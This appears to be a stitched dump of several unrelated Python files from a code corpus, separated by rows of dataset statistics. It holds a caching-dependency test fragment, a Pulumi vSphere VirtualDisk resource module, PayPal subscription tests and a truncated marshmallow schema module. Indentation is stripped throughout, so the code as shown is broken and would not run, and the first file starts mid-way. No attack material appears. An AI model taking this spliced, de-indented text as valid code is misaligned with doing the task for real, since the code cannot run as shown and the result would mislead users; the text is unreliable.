def f0(x=0):
return x + 3
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f0(1) == 4
assert f1(1) == -4
assert f2(1) == 96
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache
@mark_dependency
def f0(x=0):
return x + 3
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f0, f1, f2):
assert func.check_in_store(1)
    # However, redefining `f`, `f0`, or both should invalidate the affected cache entries.
if redefine == "f":
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
elif redefine == "f0":
@memory.cache
@mark_dependency
def f0(x=0):
return x + 2
elif redefine == "f+f0":
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
@memory.cache
@mark_dependency
def f0(x=0):
return x + 2
else:
raise ValueError("Unsupported 'redefine' value.")
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
if redefine == "f":
changed_funcs = (f, f1, f2)
elif redefine == "f0":
changed_funcs = (f0, f1, f2)
elif redefine == "f+f0":
changed_funcs = (f, f0, f1, f2)
for func in changed_funcs:
with pytest.raises(NotCachedError):
func.check_in_store(1)
if redefine == "f":
assert f(1) == 3
assert f0(1) == 4
assert f1(1) == -3
assert f2(1) == 97
elif redefine == "f0":
assert f(1) == 2
assert f0(1) == 3
assert f1(1) == -5
assert f2(1) == 95
elif redefine == "f+f0":
assert f(1) == 3
assert f0(1) == 3
assert f1(1) == -4
assert f2(1) == 96
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_chained_uncached_dependencies(memory):
"""Test cache is invalidated when chained uncached dependencies change."""
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f1(1) == -8
assert f2(1) == 92
# Defining the same functions as above should not invalidate the previous cache
# entries.
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f1, f2):
assert func.check_in_store(1)
# However, redefining `f` should invalidate all cache entries.
@mark_dependency
def f(x=0):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f1, f2):
with pytest.raises(NotCachedError):
func.check_in_store(1)
assert f(1) == 3
assert f1(1) == -7
assert f2(1) == 93
| 21.643021 | 83 | 0.587333 | 1,288 | 9,458 | 4.233696 | 0.079193 | 0.123235 | 0.146525 | 0.091693 | 0.89382 | 0.886301 | 0.879699 | 0.860811 | 0.828168 | 0.819549 | 0 | 0.050541 | 0.286636 | 9,458 | 436 | 84 | 21.692661 | 0.75767 | 0.149292 | 0 | 0.922559 | 0 | 0 | 0.024681 | 0 | 0 | 0 | 0 | 0 | 0.16835 | 1 | 0.188552 | false | 0 | 0.013468 | 0.16835 | 0.37037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
1f54eef14a5743ffa76992d327f1012c045d4442 | 23,458 | py | Python | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 38 | 2018-09-17T18:56:29.000Z | 2022-03-26T03:07:20.000Z | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 75 | 2018-09-17T13:18:24.000Z | 2022-03-31T21:32:30.000Z | sdk/python/pulumi_vsphere/virtual_disk.py | pulumi/pulumi-vsphere | a4536cd49860323bd57cbf2a127c5b57c9f9b60c | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-10-05T10:30:01.000Z | 2020-09-30T11:16:59.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['VirtualDiskArgs', 'VirtualDisk']
@pulumi.input_type
class VirtualDiskArgs:
def __init__(__self__, *,
datastore: pulumi.Input[str],
size: pulumi.Input[int],
vmdk_path: pulumi.Input[str],
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VirtualDisk resource.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
pulumi.set(__self__, "datastore", datastore)
pulumi.set(__self__, "size", size)
pulumi.set(__self__, "vmdk_path", vmdk_path)
if adapter_type is not None:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
if adapter_type is not None:
pulumi.set(__self__, "adapter_type", adapter_type)
if create_directories is not None:
pulumi.set(__self__, "create_directories", create_directories)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def datastore(self) -> pulumi.Input[str]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: pulumi.Input[str]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[int]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[int]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> pulumi.Input[str]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
@vmdk_path.setter
def vmdk_path(self, value: pulumi.Input[str]):
pulumi.set(self, "vmdk_path", value)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> Optional[pulumi.Input[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@adapter_type.setter
def adapter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adapter_type", value)
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> Optional[pulumi.Input[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@create_directories.setter
def create_directories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_directories", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when when ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _VirtualDiskState:
def __init__(__self__, *,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VirtualDisk resources.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
if adapter_type is not None:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
if adapter_type is not None:
pulumi.set(__self__, "adapter_type", adapter_type)
if create_directories is not None:
pulumi.set(__self__, "create_directories", create_directories)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if datastore is not None:
pulumi.set(__self__, "datastore", datastore)
if size is not None:
pulumi.set(__self__, "size", size)
if type is not None:
pulumi.set(__self__, "type", type)
if vmdk_path is not None:
pulumi.set(__self__, "vmdk_path", vmdk_path)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> Optional[pulumi.Input[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@adapter_type.setter
def adapter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adapter_type", value)
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> Optional[pulumi.Input[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@create_directories.setter
def create_directories(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_directories", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter
def datastore(self) -> Optional[pulumi.Input[str]]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> Optional[pulumi.Input[str]]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
@vmdk_path.setter
def vmdk_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vmdk_path", value)
class VirtualDisk(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The `VirtualDisk` resource can be used to create virtual disks outside
of any given `VirtualMachine`
resource. These disks can be attached to a virtual machine by creating a disk
block with the `attach` parameter.
## Example Usage
```python
import pulumi
import pulumi_vsphere as vsphere
my_disk = vsphere.VirtualDisk("myDisk",
datacenter="Datacenter",
datastore="local",
size=2,
type="thin",
vmdk_path="myDisk.vmdk")
```
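A disk created this way can then be attached to a virtual machine through a
disk block with the `attach` parameter (illustrative sketch; the
`VirtualMachineDiskArgs` field names and the `datastore_id` value below are
assumptions, not defined in this file):
```python
vm = vsphere.VirtualMachine("vm",
    # ... other required virtual machine arguments ...
    disks=[vsphere.VirtualMachineDiskArgs(
        label="disk1",
        attach=True,
        path=my_disk.vmdk_path,
        datastore_id=datastore_id)])
```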
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualDiskArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The `VirtualDisk` resource can be used to create virtual disks outside
of any given `VirtualMachine`
resource. These disks can be attached to a virtual machine by creating a disk
block with the `attach` parameter.
## Example Usage
```python
import pulumi
import pulumi_vsphere as vsphere
my_disk = vsphere.VirtualDisk("myDisk",
datacenter="Datacenter",
datastore="local",
size=2,
type="thin",
vmdk_path="myDisk.vmdk")
```
:param str resource_name: The name of the resource.
:param VirtualDiskArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualDiskArgs.__new__(VirtualDiskArgs)
if adapter_type is not None and not opts.urn:
warnings.warn("""this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""", DeprecationWarning)
pulumi.log.warn("""adapter_type is deprecated: this attribute has no effect on controller types - please use scsi_type in vsphere_virtual_machine instead""")
__props__.__dict__["adapter_type"] = adapter_type
__props__.__dict__["create_directories"] = create_directories
__props__.__dict__["datacenter"] = datacenter
if datastore is None and not opts.urn:
raise TypeError("Missing required property 'datastore'")
__props__.__dict__["datastore"] = datastore
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["type"] = type
if vmdk_path is None and not opts.urn:
raise TypeError("Missing required property 'vmdk_path'")
__props__.__dict__["vmdk_path"] = vmdk_path
super(VirtualDisk, __self__).__init__(
'vsphere:index/virtualDisk:VirtualDisk',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
adapter_type: Optional[pulumi.Input[str]] = None,
create_directories: Optional[pulumi.Input[bool]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
datastore: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
vmdk_path: Optional[pulumi.Input[str]] = None) -> 'VirtualDisk':
"""
Get an existing VirtualDisk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] adapter_type: The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
:param pulumi.Input[bool] create_directories: Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
:param pulumi.Input[str] datacenter: The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
:param pulumi.Input[str] datastore: The name of the datastore in which to create the
disk.
:param pulumi.Input[int] size: Size of the disk (in GB).
:param pulumi.Input[str] type: The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
:param pulumi.Input[str] vmdk_path: The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VirtualDiskState.__new__(_VirtualDiskState)
__props__.__dict__["adapter_type"] = adapter_type
__props__.__dict__["create_directories"] = create_directories
__props__.__dict__["datacenter"] = datacenter
__props__.__dict__["datastore"] = datastore
__props__.__dict__["size"] = size
__props__.__dict__["type"] = type
__props__.__dict__["vmdk_path"] = vmdk_path
return VirtualDisk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adapterType")
def adapter_type(self) -> pulumi.Output[Optional[str]]:
"""
The adapter type for this virtual disk. Can be
one of `ide`, `lsiLogic`, or `busLogic`. Default: `lsiLogic`.
"""
return pulumi.get(self, "adapter_type")
@property
@pulumi.getter(name="createDirectories")
def create_directories(self) -> pulumi.Output[Optional[bool]]:
"""
Tells the resource to create any
directories that are a part of the `vmdk_path` parameter if they are missing.
Default: `false`.
"""
return pulumi.get(self, "create_directories")
@property
@pulumi.getter
def datacenter(self) -> pulumi.Output[Optional[str]]:
"""
The name of the datacenter in which to create the
disk. Can be omitted when using ESXi or if there is only one datacenter in
your infrastructure.
"""
return pulumi.get(self, "datacenter")
@property
@pulumi.getter
def datastore(self) -> pulumi.Output[str]:
"""
The name of the datastore in which to create the
disk.
"""
return pulumi.get(self, "datastore")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Size of the disk (in GB).
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
The type of disk to create. Can be one of
`eagerZeroedThick`, `lazy`, or `thin`. Default: `eagerZeroedThick`. For
information on what each kind of disk provisioning policy means, click
[here][docs-vmware-vm-disk-provisioning].
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="vmdkPath")
def vmdk_path(self) -> pulumi.Output[str]:
"""
The path, including filename, of the virtual disk to
be created. This needs to end in `.vmdk`.
"""
return pulumi.get(self, "vmdk_path")
| 42.96337 | 173 | 0.623071 | 2,803 | 23,458 | 5.056011 | 0.074563 | 0.073737 | 0.066187 | 0.060542 | 0.879904 | 0.857183 | 0.840107 | 0.816822 | 0.808425 | 0.792478 | 0 | 0.000177 | 0.278626 | 23,458 | 545 | 174 | 43.042202 | 0.837312 | 0.370151 | 0 | 0.727941 | 1 | 0 | 0.134347 | 0.013366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154412 | false | 0.003676 | 0.018382 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2f1f20385c897eb2372dac06aca68616d7c699dd | 1,823 | py | Python | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | 110 | 2016-09-22T20:43:16.000Z | 2022-03-21T09:53:24.000Z | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | null | null | null | src/tests/paypal_tests.py | ab77/black.box | 01ab88b10763a831635d8e302e1e62544444e9fe | [
"Intel",
"OpenSSL",
"MIT"
] | 19 | 2017-04-09T00:02:31.000Z | 2021-04-19T03:40:57.000Z | from nose.tools import ok_, eq_, assert_is_not_none
from mock import patch
from uuid import uuid4
from paypal import (check_active_paypal_subscription,
get_paypal_billing_agreement,
get_paypal_billing_agreement_id_for_guid)
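# Note: stacked @patch decorators inject their mocks bottom-up, so the patch
# closest to the test function supplies the first mock argument.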
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-EJWG5K0RPNJP')
@patch('paypal.get_paypal_billing_agreement', return_value='{"agreement_state": "active"}')
def test_check_active_paypal_subscription_with_valid_guid_returns_active(mock_agreement, mock_baid):
    result = check_active_paypal_subscription(guid=uuid4().hex)
assert_is_not_none(result)
eq_(result, 'I-EJWG5K0RPNJP')
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-OSKQBX1CWVSJ')
@patch('paypal.get_paypal_billing_agreement', return_value='{"agreement_state": "active"}')
def test_check_active_paypal_subscription_with_valid_baid(mock_agreement, mock_baid):
result = check_active_paypal_subscription(baid='I-OSKQBX1CWVSJ')
assert_is_not_none(result)
eq_(result, 'I-OSKQBX1CWVSJ')
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value='I-RUE3FCPF10P5')
@patch('paypal.get_paypal_billing_agreement', return_value=None)
def test_check_active_paypal_subscription_with_valid_guid_returns_false(mock_agreement, mock_baid):
    result = check_active_paypal_subscription(guid=uuid4().hex)
assert_is_not_none(result)
eq_(result, False)
@patch('paypal.get_paypal_billing_agreement_id_for_guid', return_value=None)
@patch('paypal.get_paypal_billing_agreement', return_value=None)
def test_check_active_paypal_subscription_with_invalid_baid_returns_false(mock_agreement, mock_baid):
result = check_active_paypal_subscription(baid='I-RUE3FCPF10P5')
assert_is_not_none(result)
eq_(result, False)
| 45.575 | 98 | 0.811849 | 253 | 1,823 | 5.316206 | 0.166008 | 0.066915 | 0.118959 | 0.185874 | 0.831227 | 0.831227 | 0.831227 | 0.805948 | 0.718216 | 0.70855 | 0 | 0.010896 | 0.093801 | 1,823 | 39 | 99 | 46.74359 | 0.803269 | 0 | 0 | 0.4 | 0 | 0 | 0.265496 | 0.179923 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f49d286e9691b3844093f650fc30098428ba56d | 7,307 | py | Python | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | festival/schema.py | eubr-bigsea/festival | aa121d319769d9a414ba4e4c5b4e21879e95951e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
import json
from copy import deepcopy
from marshmallow import Schema, fields, post_load
from marshmallow.validate import OneOf
from festival.models import *
def partial_schema_factory(schema_cls):
    """ Build a partial schema, propagating `partial` into nested schemas. """
    schema = schema_cls(partial=True)
for field_name, field in schema.fields.items():
if isinstance(field, fields.Nested):
new_field = deepcopy(field)
new_field.schema.partial = True
schema.fields[field_name] = new_field
return schema
def load_json(str_value):
try:
return json.loads(str_value)
    except ValueError:
return "Error loading JSON"
# region Protected\s*
# endregion
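# Each model is serialized through three generated schemas (create request,
# list response, item response).  Typical round trip, assuming marshmallow 3
# semantics (illustrative, not part of the original file):
#   city = CityCreateRequestSchema().load({'name': 'Lisbon', 'slug': 'lisbon'})
#   payload = CityItemResponseSchema().dump(city)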
class CityCreateRequestSchema(Schema):
""" JSON serialization schema """
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class CityListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class CityItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
name = fields.String(required=True)
slug = fields.String(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of City"""
return City(**data)
class Meta:
ordered = True
class ExperimentCreateRequestSchema(Schema):
""" JSON serialization schema """
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class ExperimentListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityListResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class ExperimentItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
date = fields.DateTime(required=True)
type = fields.String(required=True,
validate=[OneOf(ResultType.__dict__.keys())])
city = fields.Nested(
'CityItemResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Experiment"""
return Experiment(**data)
class Meta:
ordered = True
class GridCellCreateRequestSchema(Schema):
""" JSON serialization schema """
north_latitude = fields.Decimal(required=True)
south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
city = fields.Nested(
'CityCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class GridCellListResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
north_latitude = fields.Decimal(required=True)
south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class GridCellItemResponseSchema(Schema):
""" JSON serialization schema """
id = fields.Integer(required=True)
north_latitude = fields.Decimal(required=True)
